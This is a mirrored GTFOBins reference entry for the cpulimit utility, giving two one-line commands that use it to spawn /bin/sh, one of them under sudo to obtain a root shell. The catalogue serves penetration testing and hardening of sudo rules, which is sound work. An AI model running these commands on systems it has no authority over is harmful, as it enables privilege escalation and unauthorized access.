mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-02-24 11:11:52 +01:00
8 lines
119 B
Markdown
8 lines
119 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: cpulimit -l 100 -f /bin/sh
|
|
sudo:
|
|
- code: sudo cpulimit -l 100 -f /bin/sh
|
|
---
|